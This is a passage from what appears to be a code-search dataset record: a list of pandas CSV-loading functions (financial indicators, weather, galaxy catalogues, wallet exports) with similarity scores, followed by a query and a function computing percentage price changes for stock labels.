'FTC']].astype(str)\r\n self.df['ACCRUED'].fillna(-1,inplace=True)#HACK SO NEXT LINE DOESN'T BLOW UP - WE DON'T WANT TO PUT 0 THERE!\r\n self.df['ACCRUED'] = self.df['ACCRUED'].astype(float)\r\n self.df['ACCRUED'] = self.df['ACCRUED'].apply(lambda x: '{:,.2f}'.format(float(x)))\r\n self.df['D2CPN'].fillna(-1, inplace=True)#HACK SO NEXT LINE DOESN'T BLOW UP - WE DON'T WANT TO PUT 0 THERE!\r\n self.df['D2CPN'] = self.df['D2CPN'].astype(int) \r\n\r\n print 'History fetched in: ' + str(int(time.time() - time_start)) + ' seconds.'", "def read_csv(config, input_file_path):\n header = read_csv_header(input_file_path)\n\n general = config['general']\n date_cols_types = ['date_cols',\n 'first_exp_date_cols',\n 'last_exp_date_cols',\n 'index_date_col',\n 'lookback_date_col']\n date_cols = utils.generate_list_columns(header, config, date_cols_types)\n # it turns out we should read the dates first in as strings\n date_cols_types = {date_col: str for date_col in date_cols}\n df = pd.read_csv(input_file_path, dtype=date_cols_types)\n # convert string dates to dates using the date format\n # Large dataset, conversion done in parallel\n if len(date_cols) > 50 or (df.shape[0] > 20000 and len(date_cols) > 1):\n print('parallel!')\n # we have to do this in parallel otherwise it takes forever\n df[date_cols] = parse_utils.apply_parallel(df[date_cols],\n parse_utils.parse_dates,\n format=general['date_format'])\n # Small dataset, faster to convert in non-parallel fashion\n elif len(date_cols) > 0:\n df[date_cols] = df[date_cols].apply(pd.to_datetime,\n format=general['date_format'])\n return df", "def readSolarData(filename):\n\treturn pd.read_csv(filename)", "def import_exodus_wallet(exodus_wallet_dir=None):\n exodus_wallets = [x for x in os.listdir(exodus_wallet_dir) if x.endswith(\".csv\")]\n\n exodus_wallet = pd.DataFrame()\n # load all wallet csvs\n for wallet in exodus_wallets:\n df = pd.read_csv(os.path.join(exodus_wallet_dir, wallet))\n exodus_wallet = exodus_wallet.append(df, ignore_index=True)\n\n # fix the formating\n exodus_wallet['DATE'] = [datetime.strptime(t,'%a %b %d %Y %H:%M:%S GMT%z (%Z)') for t in exodus_wallet['DATE']]\n exodus_wallet['DATE'] = exodus_wallet['DATE'].astype('datetime64[ns]')\n exodus_wallet['COINAMOUNT'], exodus_wallet['AMOUNT_COIN'] = exodus_wallet['COINAMOUNT'].str.split(' ', 1).str\n exodus_wallet['COINAMOUNT'] = exodus_wallet['COINAMOUNT'].astype(float)\n exodus_wallet['BALANCE'], exodus_wallet['BALANCE_COIN'] = exodus_wallet['BALANCE'].str.split(' ', 1).str\n exodus_wallet['BALANCE'] = exodus_wallet['BALANCE'].astype(float)\n exodus_wallet['FEE'], exodus_wallet['FEE_COIN'] = exodus_wallet['FEE'].str.split(' ', 1).str\n exodus_wallet['FEE'] = exodus_wallet['FEE'].astype(float)\n\n # rename columns to common names\n exodus_wallet.columns = ['TXID',\n 'TXURL',\n 'Timestamp',\n 'COINAMOUNT',\n 'COIN_TransferFee',\n 'Balance',\n 'EXCHANGE',\n 'Notes',\n 'AMOUNT_COIN',\n 'BALANCE_COIN',\n 'FEE_COIN']\n exodus_wallet['WalletName'] = 'Exodus'\n\n\n return exodus_wallet", "def prepare_data():\n df = pd.read_csv('Wholesale customers data.csv')\n df_numeric = df[['Fresh', 'Milk', 'Grocery', 'Frozen', 'Detergents_Paper', 'Delicassen']]\n return df, df_numeric", "def get_data():\r\n data = pd.read_csv(FILE_PATH)\r\n # Replace 'Zero KM' by year 2022 assuming it's a new car\r\n data['Ano'] = data['Ano'].str.replace('Zero KM', '2021').replace('2022', '2021')\r\n data['Ano'] = data['Ano'].astype(int)\r\n data['Automático'] = data['Automático'].astype(int)\r\n return data", "def 
read_data(path_to_file, survey):\n if survey == 'eco':\n columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag', \n 'logmstar', 'logmgas', 'grp', 'grpn', 'logmh', 'logmh_s', \n 'fc', 'grpmb', 'grpms']\n\n # 13878 galaxies\n eco_buff = pd.read_csv(path_to_file,delimiter=\",\", header=0, \\\n usecols=columns)\n\n # 6456 galaxies \n catl = eco_buff.loc[(eco_buff.cz.values >= 3000) & \\\n (eco_buff.cz.values <= 7000) & (eco_buff.absrmag.values <= -17.33) &\\\n (eco_buff.logmstar.values >= 8.9)]\n\n volume = 151829.26 # Survey volume without buffer [Mpc/h]^3\n cvar = 0.125\n z_median = np.median(catl.grpcz.values) / (3 * 10**5)\n \n elif survey == 'resolvea' or survey == 'resolveb':\n columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag', \n 'logmstar', 'logmgas', 'grp', 'grpn', 'grpnassoc', 'logmh', \n 'logmh_s', 'fc', 'grpmb', 'grpms', 'f_a', 'f_b']\n # 2286 galaxies\n resolve_live18 = pd.read_csv(path_to_file, delimiter=\",\", header=0, \\\n usecols=columns)\n\n if survey == 'resolvea':\n catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) & \\\n (resolve_live18.grpcz.values > 4500) & \\\n (resolve_live18.grpcz.values < 7000) & \\\n (resolve_live18.absrmag.values < -17.33) & \\\n (resolve_live18.logmstar.values >= 8.9)]\n\n\n volume = 13172.384 # Survey volume without buffer [Mpc/h]^3\n cvar = 0.30\n z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)\n \n elif survey == 'resolveb':\n # 487 - cz, 369 - grpcz\n catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) & \\\n (resolve_live18.grpcz.values > 4500) & \\\n (resolve_live18.grpcz.values < 7000) & \\\n (resolve_live18.absrmag.values < -17) & \\\n (resolve_live18.logmstar.values >= 8.7)]\n\n volume = 4709.8373 # *2.915 #Survey volume without buffer [Mpc/h]^3\n cvar = 0.58\n z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)\n\n return catl,volume,cvar,z_median", "def get_data():\n\n size, intensity, age = [], [], []\n def calculate(data, data_top):\n \"\"\"Return age and the averages of size and intensity.\"\"\"\n size, intensity, age = np.array([data[\"Size\"]]), np.array([data[\"Intensity\"]]), data_top.iat[1,0]\n size_avg, intensity_avg = np.average(size), np.average(intensity)\n return size_avg, intensity_avg, age\n \n with os.scandir(\"imgdata/\") as files:\n for entry in files:\n data = pd.read_csv(entry, header=3, index_col=0)\n data_top = pd.read_csv(entry, index_col=0, nrows=2, header=None)\n result = calculate(data, data_top)\n size.append(result[0])\n intensity.append(result[1])\n age.append(result[2])\n return size, intensity, age", "def GetOpsRates():\n return GetDataFromCsvFile('ops_rates.csv')", "def _read_data(self, fp):\n names = [\n \"Year\",\n \"Month\",\n \"Day\",\n \"Hour\",\n \"Minute\",\n \"Data Source and Uncertainty Flags\",\n \"Dry Bulb Temperature\",\n \"Dew Point Temperature\",\n \"Relative Humidity\",\n \"Atmospheric Station Pressure\",\n \"Extraterrestrial Horizontal Radiation\",\n \"Extraterrestrial Direct Normal Radiation\",\n \"Horizontal Infrared Radiation Intensity\",\n \"Global Horizontal Radiation\",\n \"Direct Normal Radiation\",\n \"Diffuse Horizontal Radiation\",\n \"Global Horizontal Illuminance\",\n \"Direct Normal Illuminance\",\n \"Diffuse Horizontal Illuminance\",\n \"Zenith Luminance\",\n \"Wind Direction\",\n \"Wind Speed\",\n \"Total Sky Cover\",\n \"Opaque Sky Cover (used if Horizontal IR Intensity missing)\",\n \"Visibility\",\n \"Ceiling Height\",\n \"Present Weather Observation\",\n \"Present Weather Codes\",\n \"Precipitable Water\",\n 
\"Aerosol Optical Depth\",\n \"Snow Depth\",\n \"Days Since Last Snowfall\",\n \"Albedo\",\n \"Liquid Precipitation Depth\",\n \"Liquid Precipitation Quantity\",\n ]\n\n first_row = self._first_row_with_climate_data(fp)\n df = pd.read_csv(fp, skiprows=first_row, header=None, names=names)\n return df", "def df_builder(path):\n\n ###CHANGE FILE ENDING (.csv or .csv.gz)\n all_files = glob.glob(\n os.path.join(path, \"probe_data_I210.201710*.csv\")) # advisable to use os.path.join as this makes concatenation OS independent\n df_from_each_file = (pd.read_csv(f) for f in all_files)\n return pd.concat(df_from_each_file, ignore_index=True)", "def createDataFrame(path):\n df = pd.read_csv(path)\n df = df[['planet_name', 'planet_mass', 'orbital_radius', 'host_name', \n 'spectral_type', 'stellar_age', 'stellar_radius', \n 'stellar_mass', 'stellar_temperature', 'stellar_luminosity', \n 'optical_magnitude', 'near_ir_magnitude', \n 'stellar_surface_gravity', 'stellar_metallicity']]\n \n df = df.dropna(subset=['spectral_type'])\n df.spectral_type = df.spectral_type.str[0:1]\n df.spectral_type = df.spectral_type.str.strip()\n classification = np.array(['O','B','A','F','G','K','M'])\n df = df[df.spectral_type.isin(classification)]\n df.insert(4, \"amount_of_planets\", 0)\n df.amount_of_planets = df.groupby('host_name')['host_name'].transform('count')\n \n df.planet_mass = np.log10(df.planet_mass)\n df.orbital_radius = np.log10(df.orbital_radius)\n \n df = df.sort_values(by=['host_name'])\n df = df.reset_index(drop=True) \n \n return df", "def prices(tickers):\n try:\n start = dt.datetime.today()\n start = start.strftime('%Y-%m-%d') \n data = pdr.get_data_yahoo(tickers, start=start)\n price = data['Adj Close']\n vol = data['Volume']\n data_dic = {}\n for stock in tickers:\n data_dic[str(stock)] = price[str(stock)][0], vol[str(stock)][0]\n \n df_data = pd.DataFrame(data_dic.values(), columns=['precio_usa', 'volumen_usa'])\n df_data['Ticker'] = tickers\n df_data = df_data.loc[:,['Ticker', 'precio_usa', 'volumen_usa']]\n\n except:\n start = dt.datetime.today()\n start = start - Day(3)\n start = start.strftime('%Y-%m-%d') \n data = pdr.get_data_yahoo(tickers, start=start)\n price = data['Adj Close']\n vol = data['Volume']\n data_dic = {}\n for stock in tickers:\n data_dic[str(stock)] = price[str(stock)][0], vol[str(stock)][0]\n \n df_data = pd.DataFrame(data_dic.values(), columns=['precio_usa', 'volumen_usa'])\n df_data['Ticker'] = tickers\n df_data = df_data.loc[:,['Ticker', 'precio_usa', 'volumen_usa']]\n\n return df_data", "def load_prices(r, name):\n data = r.hgetall(name)\n data = pd.DataFrame(data=map(lambda x: float(x), data.values()),\n index=map(lambda x: pd.Timestamp(x, '%Y-%m-%d'), data.keys()))\n data = data.sort().dropna()\n data.columns = [name]\n data.index.names = ['Date']\n return data", "def get_data_from_disc(symbol, skipFirstLines, size_output = 2):\n\n df1 = pd.read_csv( symbol_to_path(symbol)\n , index_col = 'Date'\n , parse_dates= True\n , usecols = ['Date', 'Close', 'Open', 'High', 'Low', 'Adj Close', 'Volume']\n , na_values = ['nan'])\n\n # Clean NaN values\n df = utils.dropna(df1)\n\n # Add ta features filling NaN values\n #df1 = add_all_ta_features(df, \"Open\", \"High\", \"Low\", \"Close\", fillna=True)#, \"Volume_BTC\",\n\n # Add bollinger band high indicator filling NaN values\n df1['bb_hi10' ] = bollinger_hband_indicator(df1[\"Close\"], n=10 , ndev=2, fillna=True)\n df1['bb_lo10' ] = bollinger_lband_indicator(df1[\"Close\"], n=10 , ndev=2, fillna=True)\n df1['bb_hi20' ] = 
bollinger_hband_indicator(df1[\"Close\"], n=20 , ndev=2, fillna=True)\n df1['bb_lo20' ] = bollinger_lband_indicator(df1[\"Close\"], n=20 , ndev=2, fillna=True)\n df1['bb_hi50' ] = bollinger_hband_indicator(df1[\"Close\"], n=50 , ndev=2, fillna=True)\n df1['bb_lo50' ] = bollinger_lband_indicator(df1[\"Close\"], n=50 , ndev=2, fillna=True)\n df1['bb_hi200'] = bollinger_hband_indicator(df1[\"Close\"], n=200, ndev=2, fillna=True)\n df1['bb_lo200'] = bollinger_lband_indicator(df1[\"Close\"], n=200, ndev=2, fillna=True)\n\n df1['rsi5' ] = rsi (df1[\"Close\"], n=5 , fillna=True)\n df1['rsi10' ] = rsi (df1[\"Close\"], n=10, fillna=True)\n df1['rsi20' ] = rsi (df1[\"Close\"], n=20, fillna=True)\n df1['rsi50' ] = rsi (df1[\"Close\"], n=50, fillna=True)\n\n\n df1['stoc10' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=10 , fillna=True)\n df1['stoc20' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=20 , fillna=True)\n df1['stoc50' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=50 , fillna=True)\n df1['stoc200'] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=200, fillna=True)\n\n df1['mom5' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=5 , fillna=True)\n df1['mom10' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=10 , fillna=True)\n df1['mom20' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=20 , fillna=True)\n df1['mom50' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=50 , fillna=True)\n\n df1['sma10' ] = df1['Close'].rolling(window=10 ).mean()\n df1['sma20' ] = df1['Close'].rolling(window=20 ).mean()\n df1['sma50' ] = df1['Close'].rolling(window=50 ).mean()\n df1['sma200'] = df1['Close'].rolling(window=200).mean()\n df1['sma400'] = df1['Close'].rolling(window=400).mean()\n #df1['mom']=pandas.stats.\n df1 = df1[-(df1.shape[0]-skipFirstLines):] # skip 1st x rows, x years due to NAN in sma, range\n\n df1['nvo' ] = df1['Volume'] / df1['sma10'] / 100 # normalized volume\n\n\n df1['range'] = df1['Close'] - df1['Open']\n df1['percentage'] = df1['range'] / df1['Open'] * 100\n\n #df/df.iloc[0,:]\n df1['range_sma'] = (df1 ['Close'] - df1 ['sma10']) / df1['Close']\n df1['range_sma1'] = (df1 ['sma10'] - df1 ['sma20']) / df1['sma10']#small sma above big sma indicates that price is going up\n df1['range_sma2'] = (df1 ['sma20'] - df1 ['sma50']) / df1['sma20']#small sma above big sma indicates that price is going up\n df1['range_sma3'] = (df1 ['sma50'] - df1['sma200']) / df1['sma50']#small sma above big sma indicates that price is going up\n df1['range_sma4'] = (df1['sma200'] - df1['sma400']) / df1['sma200']#small sma above big sma indicates that price is going up\n\n df1['rel_bol_hi10'] = (df1 ['High'] - df1 ['bb_hi10']) / df1['High']\n df1['rel_bol_lo10'] = (df1 ['Low'] - df1 ['bb_lo10']) / df1['Low']\n df1['rel_bol_hi20'] = (df1 ['High'] - df1 ['bb_hi20']) / df1['High']\n df1['rel_bol_lo20'] = (df1 ['Low'] - df1 ['bb_lo20']) / df1['Low']\n df1['rel_bol_hi50'] = (df1 ['High'] - df1 ['bb_hi50']) / df1['High']\n df1['rel_bol_lo50'] = (df1 ['Low'] - df1 ['bb_lo50']) / df1['Low']\n df1['rel_bol_hi200'] = (df1 ['High'] - df1 ['bb_hi200']) / df1['High']\n df1['rel_bol_lo200'] = (df1 ['Low'] - df1 ['bb_lo200']) / df1['Low']\n\n #df1['isUp'] = 0\n print(df1)\n # print ('\\ndf1=\\n',df1.tail())\n # print ('\\nsma_10=\\n',df1['sma10'] )\n # print ('\\nsma_200=\\n',df1['sma200'] )\n # print ('\\nrsi10=\\n',df1['rsi10'] )\n # print ('\\nrsi5=\\n',df1['rsi5'] )\n # print ('\\nstoc10=\\n',df1['stoc10'] )\n # print ('\\nstoc200=\\n',df1['stoc200'] )\n # print 
('\\nrangesma=\\n',df1['rangesma'])\n # print ('\\nrangesma4=\\n',df1['rangesma4'])\n # print ('\\nrel_bol_hi10=\\n',df1['rel_bol_hi10'])\n # print ('\\nrel_bol_hi200=\\n',df1['rel_bol_hi200'])\n\n # df1['sma4002' ] = sma\n # df1['ema' ] = ema\n # df1['macd' ] = macd\n # df1['stoc' ] = stoc\n # df1['rsi' ] = rsi\n#tech_ind = pd.concat([sma, ema, macd, stoc, rsi, adx, cci, aroon, bands, ad, obv, wma, mom, willr], axis=1)\n\n ## labeling\n ## smart labeling\n if size_output == 2:\n df1.loc[df1.range > 0.0, 'isUp'] = 1\n df1.loc[df1.range <= 0.0, 'isUp'] = 0\n if size_output == 3:\n df1['isUp'] = 0\n df1.loc[ df1.percentage >= +0.1 , 'isUp'] = 1\n df1.loc[ df1.percentage <= -0.1 , 'isUp'] = -1\n # df1.loc[(-0.1 < df1.percentage < +0.1), 'isUp'] = 0\n #df1['isUp'] = np.random.randint(2, size=df1.shape[0])# if u the model accuracy with random labaling expect to get 0.5\n\n\n #direction = (close > close.shift()).astype(int)\n #target = direction.shift(-1).fillna(0).astype(int)\n #target.name = 'target'\n #sma10 = sma10.rename(columns={symbol: symbol+'sma10'})\n #sma20 = sma20.rename(columns={symbol: symbol+'sma20'})\n #df1 = df1.rename(columns={'Close': symbol+'Close'})\n '''\n# loss: 0.1222 - acc: 0.9000 - val_loss: 0.1211 - val_acc: 0.9364 epoch50 sma+range+close+open (range tell model the answer)\n# loss: 0.6932 - acc: 0.4860 - val_loss: 0.6932 - val_acc: 0.4969 random data >>> random results\n# loss: 0.6922 - acc: 0.5205 - val_loss: 0.6911 - val_acc: 0.5364 epoch50 sma\n# loss: 0.6923 - acc: 0.5198 - val_loss: 0.6914 - val_acc: 0.5360\n# loss: 0.6922 - acc: 0.5217 - val_loss: 0.6911 - val_acc: 0.5353\n# loss: 0.6431 - acc: 0.5846 - val_loss: 0.7373 - val_acc: 0.5364\n# loss: 0.5373 - acc: 0.7114 - val_loss: 0.6112 - val_acc: 0.6773 epoch50\n# loss: 0.5198 - acc: 0.7225 - val_loss: 0.5632 - val_acc: 0.6797 epoch100 sma+stoc+rsi\n# loss: 0.5487 - acc: 0.7079 - val_loss: 0.6115 - val_acc: 0.6740 SPY 1970 epoch100 sma+stoc+rsi+bol 1970\n# loss: 0.4112 - acc: 0.8140 - val_loss: 0.5576 - val_acc: 0.7324 SPY 1970 epoch500 nvo+mom+sma+stoc+rsi+bol 1970\n\n# loss: 0.6047 - acc: 0.6574 - val_loss: 0.6257 - val_acc: 0.6580 SPY 2000\n# loss: nan - acc: 0.4711 - val_loss: nan - val_acc: 0.4563 DJI 2000\n# loss: nan - acc: 0.4906 - val_loss: nan - val_acc: 0.4626 QQQ 2000\n\n nvo Open High Low Close range_sma isUp\nDate \n1964-05-01 748.525452 79.459999 80.470001 79.459999 80.169998 0.001821 1.0\n1964-05-04 669.824179 80.169998 81.010002 79.870003 80.470001 0.005580 1.0\n2019-07-11 10607.754714 2999.620117 3002.330078 2988.800049 2999.909912 0.008677 1.0\n2019-07-12 9973.829690 3003.360107 3013.919922 3001.870117 3013.770020 0.010287 1.0\n'''\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width' , 1000)\n print('columns=', df1.columns)\n print ('\\ndf1=\\n',df1.loc[:, ['nvo', 'Open' ,'High' , 'Low' , 'Close', 'range_sma', 'isUp']])\n print ('\\ndf1=\\n',df1.loc[:, ['sma10','sma20','sma50','sma200', 'range_sma1']])\n print ('\\ndf1=\\n',df1.loc[:, ['rsi10','rsi20','rsi50','rsi5']])\n print ('\\ndf1=\\n',df1.loc[:, ['stoc10','stoc20','stoc50','stoc200']])\n print ('\\ndf1=\\n',df1.loc[:, ['bb_hi10','bb_hi20','bb_hi50','bb_hi200']])#, 'sma4002']])\n print ('\\ndf1=\\n',df1.loc[:, ['bb_lo10','bb_lo20','bb_lo50','bb_lo200']])#, 'sma4002']])\n print ('\\ndf1=\\n',df1.loc[:, ['rel_bol_hi10','rel_bol_hi20','rel_bol_hi50','rel_bol_hi200']])#, 'sma4002']])\n print ('\\ndf1[ 0]=\\n',df1.iloc[0])#, 'sma4002']])\n print ('\\ndf1[ 1]=\\n',df1.iloc[1])#, 'sma4002']])\n print 
('\\ndf1[9308]=\\n',df1.iloc[9308])#, 'sma4002']])\n print ('\\ndf1[-2]=\\n',df1.iloc[-2])#, 'sma4002']])\n print ('\\ndf1[-1]=\\n',df1.iloc[-1])#, 'sma4002']])\n #df = pd.DataFrame(record, columns = ['Name', 'Age', 'Stream', 'Percentage'])\n # rslt_df = df[df1['isUp'] == 1]\n # print ('\\ndf1 describe direction = +1\\n',rslt_df.describe())\n # rslt_df = df[df1['isUp'] == -1]\n # print ('\\ndf1 describe direction = -1\\n',rslt_df.describe())\n # rslt_df = df[df1['isUp'] == 0]\n # print ('\\ndf1 describe direction = 0\\n',rslt_df.describe())\n # # print ('\\ndf1=\\n',df1.loc[:, ['ema','macd','stoc', 'rsi']])\n print('\\ndf11 describe=\\n',df1.loc[:, ['percentage', 'nvo', 'range', 'mom5', 'mom10', 'mom20', 'mom50', 'rsi5', 'rsi10', 'rsi20', 'rsi50', 'stoc10', 'stoc20', 'stoc50', 'stoc200']].describe())\n return df1", "def compute_aggregate_weather_data():\n\n # get a list of all the csv files names in the 'weather_data' directory\n files = get_all_csv_files_in_directory('weather_data')\n\n # Todo: if the number of csv files doesn't match the expected value, unzip remaining using the 'os' module\n\n if len(files) == 0:\n\n # Unzip all files in current directory and subdirectories\n print \"unzipping weather files...\"\n os.system(\"unzip 'weather_data/*.zip' -d weather_data\")\n\n\n # Try again to get files\n files = get_all_csv_files_in_directory('weather_data')\n\n # Throw exception if still missing csv files\n if len(files) == 0:\n raise ValueError(\"Missing weather data in csv format in the 'weather_data' directory\")\n\n # convert the list of csv file names to a list of corresponding DataFrames\n dallas_files = filter(lambda file_name : \"KDAL\" in file_name, files)\n houston_files = filter(lambda file_name : \"KHOU\" in file_name, files)\n san_antonio_files = filter(lambda file_name : \"KSAT\" in file_name, files)\n\n print \"Retrieved weather data files...\"\n print \"\\t# of Dallas weather files found: \", len(dallas_files)\n print \"\\t# of Houston weather files found: \", len(houston_files)\n print \"\\t# of San Antonio weather files found: \", len(san_antonio_files)\n\n dallas_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), dallas_files)\n houston_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), houston_files)\n san_antonio_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), san_antonio_files)\n\n dallas_df = pd.concat(dallas_dfs)\n houston_df = pd.concat(houston_dfs)\n san_antonio_df = pd.concat(san_antonio_dfs)\n\n print \"Aggregating all of the weather data...\"\n # fold the list of data frames into a single data frame\n aggregate_df = reduce(lambda df1, df2: pd.merge(df1, df2, on=\"Date\", how=\"outer\"), [dallas_df, houston_df, san_antonio_df]).sort_values(\"Date\")\n\n return aggregate_df", "def _read_source_data(self) -> pd.DataFrame:\n df = None\n try:\n logger.info(\"reading csv base file under simulation folder\", class_name=self.__class__.__name__)\n df = pd.read_csv(\n f\"{Path(__file__).parents[1]}/data/simulation/{self.base_data_filename}\"\n )\n except FileNotFoundError:\n logger.warning(\"base file not processed, trying under unprocessed folder\",\n class_name=self.__class__.__name__)\n try:\n df = pd.read_csv(\n f\"{Path(__file__).parents[1]}/data/unprocessed/{self.base_data_filename}\"\n )\n except FileNotFoundError:\n logger.error(\"base file not found... 
exiting\", class_name=self.__class__.__name__)\n exit(1)\n return df", "def new_csv_imp(infile):\r\n with open(infile, \"r\") as fd:\r\n txt = fd.readlines()\r\n if len(txt) > 1:\r\n if 'Serial' in txt[0]:\r\n print('{:} is Solinst'.format(infile))\r\n if 'UNIT: ' in txt[7]:\r\n level_units = str(txt[7])[5:].strip().lower()\r\n if 'UNIT: ' in txt[12]:\r\n temp_units = str(txt[12])[5:].strip().lower()\r\n f = pd.read_csv(infile, skiprows=13, parse_dates=[[0, 1]], usecols=[0, 1, 3, 4])\r\n print(f.columns)\r\n f['DateTime'] = pd.to_datetime(f['Date_Time'], errors='coerce')\r\n f.set_index('DateTime', inplace=True)\r\n f.drop('Date_Time', axis=1, inplace=True)\r\n f.rename(columns={'LEVEL': 'Level', 'TEMP': 'Temp'}, inplace=True)\r\n level = 'Level'\r\n temp = 'Temp'\r\n\r\n if level_units == \"feet\" or level_units == \"ft\":\r\n f[level] = pd.to_numeric(f[level])\r\n elif level_units == \"kpa\":\r\n f[level] = pd.to_numeric(f[level]) * 0.33456\r\n printmes(\"Units in kpa, converting {:} to ft...\".format(os.path.basename(infile)))\r\n elif level_units == \"mbar\":\r\n f[level] = pd.to_numeric(f[level]) * 0.0334552565551\r\n elif level_units == \"psi\":\r\n f[level] = pd.to_numeric(f[level]) * 2.306726\r\n printmes(\"Units in psi, converting {:} to ft...\".format(os.path.basename(infile)))\r\n elif level_units == \"m\" or level_units == \"meters\":\r\n f[level] = pd.to_numeric(f[level]) * 3.28084\r\n printmes(\"Units in psi, converting {:} to ft...\".format(os.path.basename(infile)))\r\n else:\r\n f[level] = pd.to_numeric(f[level])\r\n printmes(\"Unknown units, no conversion\")\r\n\r\n if temp_units == 'Deg C' or temp_units == u'\\N{DEGREE SIGN}' + u'C':\r\n f[temp] = f[temp]\r\n elif temp_units == 'Deg F' or temp_units == u'\\N{DEGREE SIGN}' + u'F':\r\n printmes('Temp in F, converting {:} to C...'.format(os.path.basename(infile)))\r\n f[temp] = (f[temp] - 32.0) * 5.0 / 9.0\r\n return f\r\n\r\n elif 'Date' in txt[1]:\r\n print('{:} is Global'.format(infile))\r\n f = pd.read_csv(infile, skiprows=1, parse_dates=[[0, 1]])\r\n # f = f.reset_index()\r\n f['DateTime'] = pd.to_datetime(f['Date_ Time'], errors='coerce')\r\n f = f[f.DateTime.notnull()]\r\n if ' Feet' in list(f.columns.values):\r\n f['Level'] = f[' Feet']\r\n f.drop([' Feet'], inplace=True, axis=1)\r\n elif 'Feet' in list(f.columns.values):\r\n f['Level'] = f['Feet']\r\n f.drop(['Feet'], inplace=True, axis=1)\r\n else:\r\n f['Level'] = f.iloc[:, 1]\r\n # Remove first and/or last measurements if the transducer was out of the water\r\n # f = dataendclean(f, 'Level')\r\n flist = f.columns.tolist()\r\n if ' Temp C' in flist:\r\n f['Temperature'] = f[' Temp C']\r\n f['Temp'] = f['Temperature']\r\n f.drop([' Temp C', 'Temperature'], inplace=True, axis=1)\r\n elif ' Temp F' in flist:\r\n f['Temperature'] = (f[' Temp F'] - 32) * 5 / 9\r\n f['Temp'] = f['Temperature']\r\n f.drop([' Temp F', 'Temperature'], inplace=True, axis=1)\r\n else:\r\n f['Temp'] = np.nan\r\n f.set_index(['DateTime'], inplace=True)\r\n f['date'] = f.index.to_julian_date().values\r\n f['datediff'] = f['date'].diff()\r\n f = f[f['datediff'] > 0]\r\n f = f[f['datediff'] < 1]\r\n # bse = int(pd.to_datetime(f.index).minute[0])\r\n # f = hourly_resample(f, bse)\r\n f.rename(columns={' Volts': 'Volts'}, inplace=True)\r\n f.drop([u'date', u'datediff', u'Date_ Time'], inplace=True, axis=1)\r\n return f\r\n else:\r\n print('{:} is unrecognized'.format(infile))", "def get_data(fpath):\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 
'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n EVENT_ID=cdtype(visits, ordered=True))\n\n fname = op.join(fpath, 'DATScan_Analysis.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n # melt into tidy DataFrame\n data = pd.melt(data.rename(columns=RENAME_COLS),\n id_vars=RENAME_COLS.values(),\n var_name='TEST', value_name='SCORE')\n data = data.dropna(axis=0, subset=['SCORE'])\n data = data.assign(**ASSIGN_COLS)[RETAIN_COLS]\n\n return data" ]
[ "0.65828145", "0.62339157", "0.6199246", "0.6138019", "0.61140287", "0.6102608", "0.6034207", "0.6006899", "0.59451014", "0.5918473", "0.5865274", "0.5854998", "0.58193326", "0.58130115", "0.57813156", "0.5780981", "0.57623285", "0.5745247", "0.5731047", "0.57274765", "0.5706876", "0.5698789", "0.56957924", "0.56748563", "0.5631103", "0.5626811", "0.5622767", "0.5615026", "0.5595093", "0.55946773", "0.5589522", "0.5574688", "0.5569084", "0.55661976", "0.55647665", "0.55607957", "0.5558461", "0.5557236", "0.55450046", "0.554175", "0.5537679", "0.5526941", "0.55256677", "0.55143833", "0.55143833", "0.55143833", "0.55022895", "0.5496899", "0.549485", "0.5478223", "0.547385", "0.54620546", "0.5450399", "0.5447803", "0.5439068", "0.5418925", "0.54170525", "0.5412913", "0.5412124", "0.5411632", "0.5410055", "0.54042965", "0.539676", "0.539395", "0.5390772", "0.53903574", "0.5389095", "0.5377868", "0.536887", "0.536797", "0.5364796", "0.5361779", "0.53595006", "0.535744", "0.53557533", "0.5351422", "0.5349176", "0.53428614", "0.5342824", "0.5341278", "0.5331534", "0.53290695", "0.5324123", "0.5323884", "0.53225565", "0.53223485", "0.532109", "0.531664", "0.53124595", "0.53113633", "0.53054374", "0.53035873", "0.53011316", "0.52929366", "0.52899265", "0.52883846", "0.52850413", "0.5280353", "0.5278469", "0.5273854" ]
0.5412425
58
Pricing data is converted into percentage change to normalize the data; the percentage changes will be used as features, and the labels will be either buy, sell, or hold. Within each week, if the company's price increases by 2% = buy; if it decreases by 2% = sell; if neither, hold. Each model is made on a per-company basis, but each company will take into account all the other prices in the index.
def process_data_for_labels(df, ticker, time_period):\n    data_ = df.fillna(0) # ensure NaN values are replaced by 0 in case data doesn't exist.\n    # Avoiding inplace, as it does not convert NaNs as expected and will return None\n    tickers = df.columns.values.tolist() # grab all tickers (adj close columns) in the dataframe\n    for i in range(1, time_period+1): # loop through time_period (e.g. 7) days of adj close values\n        data_['{}_{}d'.format(ticker, i)] = (data_[ticker].shift(-i)-data_[ticker])/data_[ticker]\n        # create each column with the percentage change in adj close over an increasing horizon;\n        # shift(-i) grabs the adjusted close entry i days ahead.\n    data_ = data_.fillna(0) # ensure there are no NaN values left in the dataset\n    return tickers, data_ # returns list of tickers and dataframe
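The document above only builds the percentage-change feature columns; the 2% buy/sell/hold mapping described in the query is not shown. The sketch below is a minimal, assumed follow-up step — the name buy_sell_hold, the 0.02 requirement threshold, and the '_target' column name are illustrative assumptions, not taken from the source — showing how those columns could be collapsed into a single label per row.

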